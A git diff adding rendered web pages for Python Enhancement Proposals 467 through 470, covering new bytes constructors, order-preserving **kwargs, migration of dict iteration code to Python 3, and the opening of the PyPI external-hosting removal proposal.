+
+
+

Motivation

+

With Python 3 and the split between str and bytes, one small but +important area of programming became slightly more difficult, and much more +painful – wire format protocols.

+

This area of programming is characterized by a mixture of binary data and +ASCII compatible segments of text (aka ASCII-encoded text). The addition of +the new constructors, methods, and iterators will aid both in writing new +wire format code, and in porting any remaining Python 2 wire format code.

+

Common use-cases include dbf and pdf file formats, email +formats, and FTP and HTTP communications, among many others.

+
+
+

Proposals

+
+

Addition of explicit “count and byte initialised sequence” constructors

+

To replace the discouraged behavior of creating zero-filled bytes-like +objects from the basic constructors (i.e. bytes(1) –> b'\x00'), this +PEP proposes the addition of an explicit fromsize alternative constructor +as a class method on both bytes and bytearray whose first argument +is the count, and whose second argument is the fill byte to use (defaults +to \x00):

+
>>> bytes.fromsize(3)
+b'\x00\x00\x00'
+>>> bytearray.fromsize(3)
+bytearray(b'\x00\x00\x00')
+>>> bytes.fromsize(5, b'\x0a')
+b'\x0a\x0a\x0a\x0a\x0a'
+>>> bytearray.fromsize(5, fill=b'\x0a')
+bytearray(b'\x0a\x0a\x0a\x0a\x0a')
+
+
+

fromsize will behave just as the current constructors behave when passed a +single integer, while allowing for non-zero fill values when needed.

+
+
+

Addition of explicit “single byte” constructors

+

As binary counterparts to the text chr function, this PEP proposes +the addition of an explicit fromint alternative constructor as a class +method on both bytes and bytearray:

+
>>> bytes.fromint(65)
+b'A'
+>>> bytearray.fromint(65)
+bytearray(b'A')
+
+
+

These methods will only accept integers in the range 0 to 255 (inclusive):

+
>>> bytes.fromint(512)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+ValueError: integer must be in range(0, 256)
+
+>>> bytes.fromint(1.0)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: 'float' object cannot be interpreted as an integer
+
+
+

The documentation of the ord builtin will be updated to explicitly note +that bytes.fromint is the primary inverse operation for binary data, while +chr is the inverse operation for text data, and that bytearray.fromint +also exists.

+

Behaviorally, bytes.fromint(x) will be equivalent to the current +bytes([x]) (and similarly for bytearray). The new spelling is +expected to be easier to discover and easier to read (especially when used +in conjunction with indexing operations on binary sequence types).

+

As a separate method, the new spelling will also work better with higher +order functions like map.

+

These new methods intentionally do NOT offer the same level of general integer +support as the existing int.to_bytes conversion method, which allows +arbitrarily large integers to be converted to arbitrarily long bytes objects. The +restriction to only accept positive integers that fit in a single byte means +that no byte order information is needed, and there is no need to handle +negative numbers. The documentation of the new methods will refer readers to +int.to_bytes for use cases where handling of arbitrary integers is needed.
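
For reference, the int.to_bytes behaviour that these methods deliberately do not duplicate:

>>> (1024).to_bytes(2, 'big')
b'\x04\x00'
>>> (-1024).to_bytes(2, 'big', signed=True)
b'\xfc\x00'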

+
+
+

Addition of “getbyte” method to retrieve a single byte

+

This PEP proposes that bytes and bytearray gain the method getbyte +which will always return bytes:

+
>>> b'abc'.getbyte(0)
+b'a'
+
+
+

If an index is asked for that doesn’t exist, IndexError is raised:

+
>>> b'abc'.getbyte(9)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IndexError: index out of range
+
+
+
+
+

Addition of optimised iterator methods that produce bytes objects

+

This PEP proposes that bytes and bytearray gain an optimised +iterbytes method that produces length 1 bytes objects rather than +integers:

+
for x in data.iterbytes():
+    # x is a length 1 ``bytes`` object, rather than an integer
+
+
+

For example:

+
>>> tuple(b"ABC".iterbytes())
+(b'A', b'B', b'C')
+
+
+
+
+
+

Design discussion

+
+

Why not rely on sequence repetition to create zero-initialised sequences?

+

Zero-initialised sequences can be created via sequence repetition:

+
>>> b'\x00' * 3
+b'\x00\x00\x00'
+>>> bytearray(b'\x00') * 3
+bytearray(b'\x00\x00\x00')
+
+
+

However, this was also the case when the bytearray type was originally +designed, and the decision was made to add explicit support for it in the +type constructor. The immutable bytes type then inherited that feature +when it was introduced in PEP 3137.

+

This PEP isn’t revisiting that original design decision, just changing the +spelling as users sometimes find the current behavior of the binary sequence +constructors surprising. In particular, there’s a reasonable case to be made +that bytes(x) (where x is an integer) should behave like the +bytes.fromint(x) proposal in this PEP. Providing both behaviors as separate +class methods avoids that ambiguity.

+
+
+

Current Workarounds

+

After nearly a decade, there seems to be no consensus on the best workarounds +for byte iteration, as demonstrated by +Get single-byte bytes objects from bytes objects.
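
A few of the competing spellings in current Python, for contrast with the proposed data.iterbytes() (all produce (b'A', b'B', b'C')):

import struct

data = b"ABC"
tuple(data[i:i+1] for i in range(len(data)))  # slicing
tuple(bytes([b]) for b in data)               # re-wrapping each integer
struct.unpack('3c', data)                     # format string depends on length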

+
+
+

Omitting the originally proposed builtin function

+

When submitted to the Steering Council, this PEP proposed the introduction of +a bchr builtin (with the same behaviour as bytes.fromint), recreating +the ord/chr/unichr trio from Python 2 under a different naming +scheme (ord/bchr/chr).

+

The SC indicated they didn’t think this functionality was needed often enough +to justify offering two ways of doing the same thing, especially when one of +those ways was a new builtin function. That part of the proposal was therefore +dropped as being redundant with the bytes.fromint alternate constructor.

+

Developers that use this method frequently will instead have the option to +define their own bchr = bytes.fromint aliases.

+
+
+

Scope limitation: memoryview

+

Updating memoryview with the new item retrieval methods is outside the scope +of this PEP.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0467.rst

+

Last modified: 2024-02-07 13:44:54 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0468/index.html b/pep-0468/index.html new file mode 100644 index 00000000000..d109e05b354 --- /dev/null +++ b/pep-0468/index.html @@ -0,0 +1,555 @@ + + + + + + + + PEP 468 – Preserving the order of **kwargs in a function. | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 468 – Preserving the order of **kwargs in a function.

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Apr-2014
+
Python-Version:
+
3.6
+
Post-History:
+
05-Apr-2014, 08-Sep-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The **kwargs syntax in a function definition indicates that the +interpreter should collect all keyword arguments that do not correspond +to other named parameters. However, Python does not preserve the +order in which those collected keyword arguments were passed to the +function. In some contexts the order matters. This PEP dictates that +the collected keyword arguments be exposed in the function body as an +ordered mapping.

+
+
+

Motivation

+

Python’s **kwargs syntax in function definitions provides a powerful +means of dynamically handling keyword arguments. In some applications +of the syntax (see Use Cases), the semantics applied to the +collected keyword arguments requires that order be preserved. +Unsurprisingly, this is similar to how OrderedDict is related to dict.

+

Currently, to preserve the order you have to do so manually and +separately from the actual function call. This involves building an +ordered mapping, whether an OrderedDict or an iterable of 2-tuples, +which is then passed as a single argument to the function. +[1]

+

With the capability described in this PEP, that boilerplate would no +longer be required.

+

For comparison, currently:

+
kwargs = OrderedDict()
+kwargs['eggs'] = ...
+...
+def spam(a, kwargs):
+    ...
+
+
+

and with this proposal:

+
def spam(a, **kwargs):
+    ...
+
+
+

Alyssa (Nick) Coghlan, speaking of some of the use cases, summed it up well +[2]:

+
These *can* all be done today, but *not* by using keyword arguments.
+In my view, the problem to be addressed is that keyword arguments
+*look* like they should work for these cases, because they have a
+definite order in the source code. The only reason they don't work
+is because the interpreter throws that ordering information away.
+
+It's a textbook case of a language feature becoming an attractive
+nuisance in some circumstances: the simple and obvious solution for
+the above use cases *doesn't actually work* for reasons that aren't
+obviously clear if you don't have a firm grasp of Python's admittedly
+complicated argument handling.
+
+
+

This observation is supported by the appearance of this proposal over +the years and the numerous times that people have been confused by the +constructor for OrderedDict. [3] [4] +[5]

+
+
+

Use Cases

+

As Alyssa noted, the current behavior of **kwargs is unintuitive in +cases where one would expect order to matter. Aside from more specific +cases outlined below, in general “anything else where you want to +control the iteration order and set field names and values in a single +call will potentially benefit.” [6] That matters in the +case of factories (e.g. __init__()) for ordered types.

+
+

Serialization

+

Obviously OrderedDict would benefit (both __init__() and update()) from +ordered kwargs. However, the benefit also extends to serialization +APIs [2]:

+
In the context of serialisation, one key lesson we have learned is
+that arbitrary ordering is a problem when you want to minimise
+spurious diffs, and sorting isn't a simple solution.
+
+Tools like doctest don't tolerate spurious diffs at all, but are
+often amenable to a sorting based answer.
+
+The cases where it would be highly desirable to be able use keyword
+arguments to control the order of display of a collection of key
+value pairs are ones like:
+
+* printing out key:value pairs in CLI output
+* mapping semantic names to column order in a CSV
+* serialising attributes and elements in particular orders in XML
+* serialising map keys in particular orders in human readable formats
+  like JSON and YAML (particularly when they're going to be placed
+  under source control)
+
+
+
+
+

Debugging

+

In the words of Raymond Hettinger [7]:

+
It makes it easier to debug if the arguments show-up in the order
+they were created.  AFAICT, no purpose is served by scrambling them.
+
+
+
+
+

Other Use Cases

+
    +
  • Mock objects. [8]
  • +
  • Controlling object presentation.
  • +
  • Alternate namedtuple() where defaults can be specified.
  • +
  • Specifying argument priority by order.
  • +
+
+
+
+

Concerns

+
+

Performance

+

As already noted, the idea of ordered keyword arguments has come up on +a number of occasions. Each time it has been met with the same +response, namely that preserving keyword arg order would have a +sufficiently adverse effect on function call performance that it’s not +worth doing. However, Guido noted the following [9]:

+
Making **kwds ordered is still open, but requires careful design and
+implementation to avoid slowing down function calls that don't benefit.
+
+
+

As will be noted below, there are ways to work around this at the +expense of increased complication. Ultimately the simplest approach is +the one that makes the most sense: pack collected keyword arguments +into an OrderedDict. However, without a C implementation of OrderedDict +there isn’t much to discuss. That changed in Python 3.5. +[10]

+

Note: in Python 3.6 dict is order-preserving. This virtually eliminates +performance concerns.

+
+
+

Other Python Implementations

+

Another important issue to consider is that new features must be +cognizant of the multiple Python implementations. At some point each of +them would be expected to have implemented ordered kwargs. In this +regard there doesn’t seem to be an issue with the idea. [11] +An informal survey of the major Python implementations has indicated +that this feature will not be a significant burden.

+
+
+
+

Specification

+

Starting in version 3.6 Python will preserve the order of keyword +arguments as passed to a function. To accomplish this the collected +kwargs will now be an ordered mapping. Note that this does not necessarily +mean OrderedDict. dict in CPython 3.6 is now ordered, similar to PyPy.

+

This will apply only to functions for which the definition uses the +**kwargs syntax for collecting otherwise unspecified keyword +arguments. Only the order of those keyword arguments will be +preserved.
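
For example (this is the guaranteed behaviour from 3.6 onward):

>>> def spam(a, **kwargs):
...     return list(kwargs)
...
>>> spam(1, eggs=2, ham=3, toast=4)
['eggs', 'ham', 'toast']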

+
+

Relationship to **-unpacking syntax

+

The ** unpacking syntax in function calls has no special connection with +this proposal. Keyword arguments provided by unpacking will be treated +in exactly the same way as they are now: ones that match defined +parameters are gathered there, and the remainder will be collected into the +ordered kwargs (just like any other unmatched keyword argument).

+

Note that unpacking a mapping with undefined order, such as dict, will +preserve its iteration order like normal. It’s just that the order will +remain undefined. The ordered mapping into which the unpacked key-value +pairs will then be packed will not be able to provide any alternate +ordering. This should not be surprising.

+

There have been brief discussions of simply passing these mappings +through to the function’s kwargs without unpacking and repacking them, +but that is both outside the scope of this proposal and probably a bad +idea regardless. (There is a reason those discussions were brief.)

+
+
+

Relationship to inspect.Signature

+

Signature objects should need no changes. The kwargs parameter of +inspect.BoundArguments (returned by Signature.bind() and +Signature.bind_partial()) will change from a dict to an OrderedDict.
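
For instance, a quick sketch of the resulting behaviour:

>>> import inspect
>>> def spam(a, **kwargs): pass
>>> ba = inspect.signature(spam).bind(1, eggs=2, ham=3)
>>> list(ba.kwargs)
['eggs', 'ham']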

+
+
+

C-API

+

No changes.

+
+
+

Syntax

+

No syntax is added or changed by this proposal.

+
+
+

Backward-Compatibility

+

The following will change:

+
    +
  • iteration order of kwargs will now be consistent (except of course in +the case described above)
  • +
+
+
+
+

Reference Implementation

+

For CPython there’s nothing to do.

+
+
+

Alternate Approaches

+
+

Opt-out Decorator

+

This is identical to the current proposal with the exception that Python +would also provide a decorator in functools that would cause collected +keyword arguments to be packed into a normal dict instead of an +OrderedDict.

+

Prognosis:

+

This would only be necessary if performance is determined to be +significantly different in some uncommon cases or if there are other +backward-compatibility concerns that cannot be resolved otherwise.

+
+
+

Opt-in Decorator

+

The status quo would be unchanged. Instead Python would provide a +decorator in functools that would register or mark the decorated +function as one that should get ordered keyword arguments. The +performance overhead to check the function at call time would be +marginal.

+

Prognosis:

+

The only real down-side is in the case of function wrapper factories +(e.g. functools.partial and many decorators) that aim to perfectly +preserve keyword arguments by using kwargs in the wrapper definition +and kwargs unpacking in the call to the wrapped function. Each wrapper +would have to be updated separately, though having functools.wraps() do +this automatically would help.
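For concreteness, the pass-through pattern in question (a generic sketch, not code from the PEP):

import functools

def logged(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        # kwargs is collected here and unpacked again below; any opt-in
        # marker on func would have to be propagated for the wrapped
        # call to keep seeing ordered keyword arguments.
        print('calling', func.__name__)
        return func(*args, **kwargs)
    return wrapper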

+
+
+

__kworder__

+

The order of keyword arguments would be stored separately in a list at +call time. The list would be bound to __kworder__ in the function +locals.

+

Prognosis:

+

This likewise complicates the wrapper case.

+
+
+

Compact dict with faster iteration

+

Raymond Hettinger has introduced the idea of a dict implementation that +would result in preserving insertion order on dicts (until the first +deletion). This would be a perfect fit for kwargs. [5]

+

Prognosis:

+

The idea is still uncertain in both viability and timeframe.

+

Note that Python 3.6 now has this dict implementation.

+
+
+

***kwargs

+

This would add a new form to a function’s signature as a mutually +exclusive parallel to **kwargs. The new syntax, ***kwargs (note +that there are three asterisks), would indicate that kwargs should +preserve the order of keyword arguments.

+

Prognosis:

+

New syntax is only added to Python under the most dire circumstances. +With other available solutions, new syntax is not justifiable. +Furthermore, like all opt-in solutions, the new syntax would complicate +the pass-through case.

+
+
+

annotations

+

This is a variation on the decorator approach. Instead of using a +decorator to mark the function, you would use a function annotation on +**kwargs.

+

Prognosis:

+

In addition to the pass-through complication, annotations have been +actively discouraged in Python core development. Use of annotations to +opt-in to order preservation runs the risk of interfering with other +application-level use of annotations.

+
+
+

dict.__order__

+

dict objects would have a new attribute, __order__, that would default +to None and that, in the kwargs case, the interpreter would use in the +same way as described above for __kworder__.

+

Prognosis:

+

It would mean zero impact on kwargs performance but the change would be +pretty intrusive (Python uses dict a lot). Also, for the wrapper case +the interpreter would have to be careful to preserve __order__.

+
+
+

KWArgsDict.__order__

+

This is the same as the dict.__order__ idea, but kwargs would be an +instance of a new minimal dict subclass that provides the __order__ +attribute. dict would instead be unchanged.

+

Prognosis:

+

Simply switching to OrderedDict is a less complicated and more intuitive +change.

+
+
+
+

Acknowledgements

+

Thanks to Andrew Barnert for helpful feedback and to the participants of +all the past email threads.

+
+
+

Footnotes

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0468.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0469/index.html b/pep-0469/index.html new file mode 100644 index 00000000000..40ab12a966b --- /dev/null +++ b/pep-0469/index.html @@ -0,0 +1,495 @@ + PEP 469 – Migration of dict iteration code to Python 3 | peps.python.org
+
+


+ + +
+
+
+

PEP 469 – Migration of dict iteration code to Python 3

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
18-Apr-2014
+
Python-Version:
+
3.5
+
Post-History:
+
18-Apr-2014, 21-Apr-2014
+
+
+
+
Table of Contents +
+
+

Abstract

+

For Python 3, PEP 3106 changed the design of the dict builtin and the +mapping API in general to replace the separate list based and iterator based +APIs in Python 2 with a merged, memory efficient set and multiset view +based API. This new style of dict iteration was also added to the Python 2.7 +dict type as a new set of iteration methods.

+

This means that there are now 3 different kinds of dict iteration that may +need to be migrated to Python 3 when an application makes the transition:

+
    +
  • Lists as mutable snapshots: d.items() -> list(d.items())
  • +
  • Iterator objects: d.iteritems() -> iter(d.items())
  • +
  • Set based dynamic views: d.viewitems() -> d.items()
  • +
+

There is currently no widely agreed best practice on how to reliably convert +all Python 2 dict iteration code to the common subset of Python 2 and 3, +especially when test coverage of the ported code is limited. This PEP +reviews the various ways the Python 2 iteration APIs may be accessed, and +looks at the available options for migrating that code to Python 3 by way of +the common subset of Python 2.6+ and Python 3.0+.

+

The PEP also considers the question of whether or not there are any +additions that may be worth making to Python 3.5 that may ease the +transition process for application code that doesn’t need to worry about +supporting earlier versions when eventually making the leap to Python 3.

+
+
+

PEP Withdrawal

+

In writing the second draft of this PEP, I came to the conclusion that +the readability of hybrid Python 2/3 mapping code can actually be best +enhanced by better helper functions rather than by making changes to +Python 3.5+. The main value I now see in this PEP is as a clear record +of the recommended approaches to migrating mapping iteration code from +Python 2 to Python 3, as well as suggesting ways to keep things readable +and maintainable when writing hybrid code that supports both versions.

+

Notably, I recommend that hybrid code avoid calling mapping iteration +methods directly, and instead rely on builtin functions where possible, +and some additional helper functions for cases that would be a simple +combination of a builtin and a mapping method in pure Python 3 code, but +need to be handled slightly differently to get the exact same semantics in +Python 2.

+

Static code checkers like pylint could potentially be extended with an +optional warning regarding direct use of the mapping iteration methods in +a hybrid code base.

+
+
+

Mapping iteration models

+

Python 2.7 provides three different sets of methods to extract the keys, +values and items from a dict instance, accounting for 9 out of the +18 public methods of the dict type.

+

In Python 3, this has been rationalised to just 3 out of 11 public methods +(as the has_key method has also been removed).

+
+

Lists as mutable snapshots

+

This is the oldest of the three styles of dict iteration, and hence the +one implemented by the d.keys(), d.values() and d.items() +methods in Python 2.

+

These methods all return lists that are snapshots of the state of the +mapping at the time the method was called. This has a few consequences:

+
    +
  • the original object can be mutated freely without affecting iteration +over the snapshot
  • +
  • the snapshot can be modified independently of the original object
  • +
  • the snapshot consumes memory proportional to the size of the original +mapping
  • +
+

The semantic equivalents of these operations in Python 3 are +list(d.keys()), list(d.values()) and list(d.items()).
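A brief illustration of the snapshot semantics, written with the Python 3 spellings:

d = {'a': 1}
keys = list(d)      # a snapshot of the keys at this moment
d['b'] = 2          # mutating d does not affect the snapshot
print(keys)         # ['a']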

+
+
+

Iterator objects

+

In Python 2.2, dict objects gained support for the then-new iterator +protocol, allowing direct iteration over the keys stored in the dictionary, +thus avoiding the need to build a list just to iterate over the dictionary +contents one entry at a time. iter(d) provides direct access to the +iterator object for the keys.

+

Python 2 also provides a d.iterkeys() method that is essentially +synonymous with iter(d), along with d.itervalues() and +d.iteritems() methods.

+

These iterators provide live views of the underlying object, and hence may +fail if the set of keys in the underlying object is changed during +iteration:

+
>>> d = dict(a=1)
+>>> for k in d:
+...     del d[k]
+...
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+RuntimeError: dictionary changed size during iteration
+
+
+

As iterators, iteration over these objects is also a one-time operation: +once the iterator is exhausted, you have to go back to the original mapping +in order to iterate again.

+

In Python 3, direct iteration over mappings works the same way as it does +in Python 2. There are no method based equivalents - the semantic equivalents +of d.itervalues() and d.iteritems() in Python 3 are +iter(d.values()) and iter(d.items()).

+

The six and future.utils compatibility modules also both provide +iterkeys(), itervalues() and iteritems() helper functions that +provide efficient iterator semantics in both Python 2 and 3.
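For example, with six (assuming it is installed):

from six import iteritems

d = {'a': 1, 'b': 2}
for key, value in iteritems(d):
    # d.iteritems() on Python 2, iter(d.items()) on Python 3
    print(key, value)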

+
+
+

Set based dynamic views

+

The model that is provided in Python 3 as a method based API is that of set +based dynamic views (technically multisets in the case of the values() +view).

+

In Python 3, the objects returned by d.keys(), d.values() and +d.items() provide a live view of the current state of +the underlying object, rather than taking a full snapshot of the current +state as they did in Python 2. This change is safe in many circumstances, +but does mean that, as with the direct iteration API, it is necessary to +avoid adding or removing keys during iteration, in order to avoid +encountering the following error:

+
>>> d = dict(a=1)
+>>> for k, v in d.items():
+...     del d[k]
+...
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+RuntimeError: dictionary changed size during iteration
+
+
+

Unlike the iteration API, these objects are iterables, rather than iterators: +you can iterate over them multiple times, and each time they will iterate +over the entire underlying mapping.
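For instance:

d = {'a': 1, 'b': 2}
items = d.items()        # a dynamic view, not a one-shot iterator
first = list(items)
second = list(items)     # iterating again covers the full mapping
print(first == second)   # True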

+

These semantics are also available in Python 2.7 as the d.viewkeys(), +d.viewvalues() and d.viewitems() methods.

+

The future.utils compatibility module also provides +viewkeys(), viewvalues() and viewitems() helper functions +when running on Python 2.7 or Python 3.x.

+
+
+
+

Migrating directly to Python 3

+

The 2to3 migration tool handles direct migrations to Python 3 in +accordance with the semantic equivalents described above:

+
    +
  • d.keys() -> list(d.keys())
  • +
  • d.values() -> list(d.values())
  • +
  • d.items() -> list(d.items())
  • +
  • d.iterkeys() -> iter(d.keys())
  • +
  • d.itervalues() -> iter(d.values())
  • +
  • d.iteritems() -> iter(d.items())
  • +
  • d.viewkeys() -> d.keys()
  • +
  • d.viewvalues() -> d.values()
  • +
  • d.viewitems() -> d.items()
  • +
+

Rather than 9 distinct mapping methods for iteration, there are now only the +3 view methods, which combine in straightforward ways with the two relevant +builtin functions to cover all of the behaviours that are available as +dict methods in Python 2.7.

+

Note that in many cases d.keys() can be replaced by just d, but the +2to3 migration tool doesn’t attempt that replacement.

+

The 2to3 migration tool also does not provide any automatic assistance +for migrating references to these objects as bound or unbound methods - it +only automates conversions where the API is called immediately.

+
+
+

Migrating to the common subset of Python 2 and 3

+

When migrating to the common subset of Python 2 and 3, the above +transformations are not generally appropriate, as they all either result in +the creation of a redundant list in Python 2, have unexpectedly different +semantics in at least some cases, or both.

+

Since most code running in the common subset of Python 2 and 3 supports +at least as far back as Python 2.6, the currently recommended approach to +conversion of mapping iteration operations depends on two helper functions +for efficient iteration over mapping values and mapping item tuples:

+
    +
  • d.keys() -> list(d)
  • +
  • d.values() -> list(itervalues(d))
  • +
  • d.items() -> list(iteritems(d))
  • +
  • d.iterkeys() -> iter(d)
  • +
  • d.itervalues() -> itervalues(d)
  • +
  • d.iteritems() -> iteritems(d)
  • +
+

Both six and future.utils provide appropriate definitions of +itervalues() and iteritems() (along with essentially redundant +definitions of iterkeys()). Creating your own definitions of these +functions in a custom compatibility module is also relatively +straightforward:

+
try:
+    dict.iteritems
+except AttributeError:
+    # Python 3
+    def itervalues(d):
+        return iter(d.values())
+    def iteritems(d):
+        return iter(d.items())
+else:
+    # Python 2
+    def itervalues(d):
+        return d.itervalues()
+    def iteritems(d):
+        return d.iteritems()
+
+
+

The greatest loss of readability currently arises when converting code that +actually needs the list based snapshots that were the default in Python +2. This readability loss could likely be mitigated by also providing +listvalues and listitems helper functions, allowing the affected +conversions to be simplified to:

+
    +
  • d.values() -> listvalues(d)
  • +
  • d.items() -> listitems(d)
  • +
+

The corresponding compatibility function definitions are as straightforward +as their iterator counterparts:

+
try:
+    dict.iteritems
+except AttributeError:
+    # Python 3
+    def listvalues(d):
+        return list(d.values())
+    def listitems(d):
+        return list(d.items())
+else:
+    # Python 2
+    def listvalues(d):
+        return d.values()
+    def listitems(d):
+        return d.items()
+
+
+

With that expanded set of compatibility functions, Python 2 code would +then be converted to “idiomatic” hybrid 2/3 code as:

+
    +
  • d.keys() -> list(d)
  • +
  • d.values() -> listvalues(d)
  • +
  • d.items() -> listitems(d)
  • +
  • d.iterkeys() -> iter(d)
  • +
  • d.itervalues() -> itervalues(d)
  • +
  • d.iteritems() -> iteritems(d)
  • +
+

This compares well for readability with the idiomatic pure Python 3 +code that uses the mapping methods and builtins directly:

+
    +
  • d.keys() -> list(d)
  • +
  • d.values() -> list(d.values())
  • +
  • d.items() -> list(d.items())
  • +
  • d.iterkeys() -> iter(d)
  • +
  • d.itervalues() -> iter(d.values())
  • +
  • d.iteritems() -> iter(d.items())
  • +
+

It’s also notable that when using this approach, hybrid code would never +invoke the mapping methods directly: it would always invoke either a +builtin or helper function instead, in order to ensure the exact same +semantics on both Python 2 and 3.

+
+
+

Migrating from Python 3 to the common subset with Python 2.7

+

While the majority of migrations are currently from Python 2 either directly +to Python 3 or to the common subset of Python 2 and Python 3, there are also +some migrations of newer projects that start in Python 3 and then later +add Python 2 support, either due to user demand, or to gain access to +Python 2 libraries that are not yet available in Python 3 (and porting them +to Python 3 or creating a Python 3 compatible replacement is not a trivial +exercise).

+

In these cases, Python 2.7 compatibility is often sufficient, and the 2.7+ +only view based helper functions provided by future.utils allow the bare +accesses to the Python 3 mapping view methods to be replaced with code that +is compatible with both Python 2.7 and Python 3 (note, this is the only +migration chart in the PEP that has Python 3 code on the left of the +conversion):

+
    +
  • d.keys() -> viewkeys(d)
  • +
  • d.values() -> viewvalues(d)
  • +
  • d.items() -> viewitems(d)
  • +
  • list(d.keys()) -> list(d)
  • +
  • list(d.values()) -> listvalues(d)
  • +
  • list(d.items()) -> listitems(d)
  • +
  • iter(d.keys()) -> iter(d)
  • +
  • iter(d.values()) -> itervalues(d)
  • +
  • iter(d.items()) -> iteritems(d)
  • +
+

As with migrations from Python 2 to the common subset, note that the hybrid +code ends up never invoking the mapping methods directly - it only calls +builtins and helper methods, with the latter addressing the semantic +differences between Python 2 and Python 3.

+
+
+

Possible changes to Python 3.5+

+

The main proposal put forward to potentially aid migration of existing +Python 2 code to Python 3 is the restoration of some or all of the +alternate iteration APIs to the Python 3 mapping API. In particular, +the initial draft of this PEP proposed making the following conversions +possible when migrating to the common subset of Python 2 and Python 3.5+:

+
    +
  • d.keys() -> list(d)
  • +
  • d.values() -> list(d.itervalues())
  • +
  • d.items() -> list(d.iteritems())
  • +
  • d.iterkeys() -> d.iterkeys()
  • +
  • d.itervalues() -> d.itervalues()
  • +
  • d.iteritems() -> d.iteritems()
  • +
+

Possible mitigations of the additional language complexity in Python 3 +created by restoring these methods included immediately deprecating them, +as well as potentially hiding them from the dir() function (or perhaps +even defining a way to make pydoc aware of function deprecations).

+

However, in the case where the list output is actually desired, the end +result of that proposal is actually less readable than an appropriately +defined helper function, and the function and method forms of the iterator +versions are pretty much equivalent from a readability perspective.

+

So unless I’ve missed something critical, readily available listvalues() +and listitems() helper functions look like they will improve the +readability of hybrid code more than anything we could add back to the +Python 3.5+ mapping API, and won’t have any long-term impact on the +complexity of Python 3 itself.

+
+
+

Discussion

+

The fact that 5 years into the Python 3 migration we still have users +considering the dict API changes a significant barrier to migration suggests +that there are problems with previously recommended approaches. This PEP +attempts to explore those issues and tries to isolate those cases where +previous advice (such as it was) could prove problematic.

+

My assessment (largely based on feedback from Twisted devs) is that +problems are most likely to arise when attempting to use d.keys(), +d.values(), and d.items() in hybrid code. While superficially it +seems as though there should be cases where it is safe to ignore the +semantic differences, in practice, the change from “mutable snapshot” to +“dynamic view” is significant enough that it is likely better +to just force the use of either list or iterator semantics for hybrid code, +and leave the use of the view semantics to pure Python 3 code.

+

This approach also creates rules that are simple enough and safe enough that +it should be possible to automate them in code modernisation scripts that +target the common subset of Python 2 and Python 3, just as 2to3 converts +them automatically when targeting pure Python 3 code.

+
+
+

Acknowledgements

+

Thanks to the folks at the Twisted sprint table at PyCon for a very +vigorous discussion of this idea (and several other topics), and especially +to Hynek Schlawack for acting as a moderator when things got a little too +heated :)

+

Thanks also to JP Calderone and Itamar Turner-Trauring for their email +feedback, as well to the participants in the python-dev review of +the initial version of the PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0469.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0470/index.html b/pep-0470/index.html new file mode 100644 index 00000000000..0ee5f8a486e --- /dev/null +++ b/pep-0470/index.html @@ -0,0 +1,577 @@ + PEP 470 – Removing External Hosting Support on PyPI | peps.python.org
+
+


+ + +
+
+
+

PEP 470 – Removing External Hosting Support on PyPI

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
12-May-2014
+
Post-History:
+
14-May-2014, 05-Jun-2014, 03-Oct-2014, 13-Oct-2014, 26-Aug-2015
+
Replaces:
+
438
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the deprecation and removal of support for hosting files +externally to PyPI as well as the deprecation and removal of the functionality +added by PEP 438, particularly rel information to classify different types of +links and the meta-tag to indicate API version.

+
+
+

Rationale

+

Historically PyPI did not have any method of hosting files nor any method of +automatically retrieving installables; it was instead focused on providing a +central registry of names, to prevent naming collisions, and as a means of +discovery for finding projects to use. In the course of time setuptools began +to scrape these human facing pages, as well as pages linked from those pages, +looking for things it could automatically download and install. Eventually this +became the “Simple” API, which used a similar URL structure; however, it +eliminated any of the extraneous links and information to make the API more +efficient. Additionally PyPI grew the ability for a project to upload release +files directly to PyPI, enabling PyPI to act as a repository in addition to an +index.

+

This gives PyPI two equally important roles that it plays in the Python +ecosystem, that of index to enable easy discovery of Python projects and +central repository to enable easy hosting, download, and installation of Python +projects. Due to the history behind PyPI and the very organic growth it has +experienced the lines between these two roles are blurry, and this blurring has +caused confusion for the end users of both of these roles and this has in turn +caused ire between people attempting to use PyPI in different capacities, most +often when end users want to use PyPI as a repository but the author wants to +use PyPI solely as an index.

+

This confusion comes down to end users of projects not realizing if a project +is hosted on PyPI or if it relies on an external service. This often manifests +itself when the external service is down but PyPI is not. People will see that +PyPI works, and other projects work, but this one specific project does not. They +oftentimes do not realize who they need to contact in order to get this fixed +or what their remediation steps are.

+

PEP 438 attempted to solve this issue by allowing projects to explicitly +declare if they were using the repository features or not, and if they were +not, it had the installers classify the links it found as either “internal”, +“verifiable external” or “unverifiable external”. PEP 438 was accepted and +implemented in pip 1.4 (released on Jul 23, 2013) with the final transition +implemented in pip 1.5 (released on Jan 2, 2014).

+

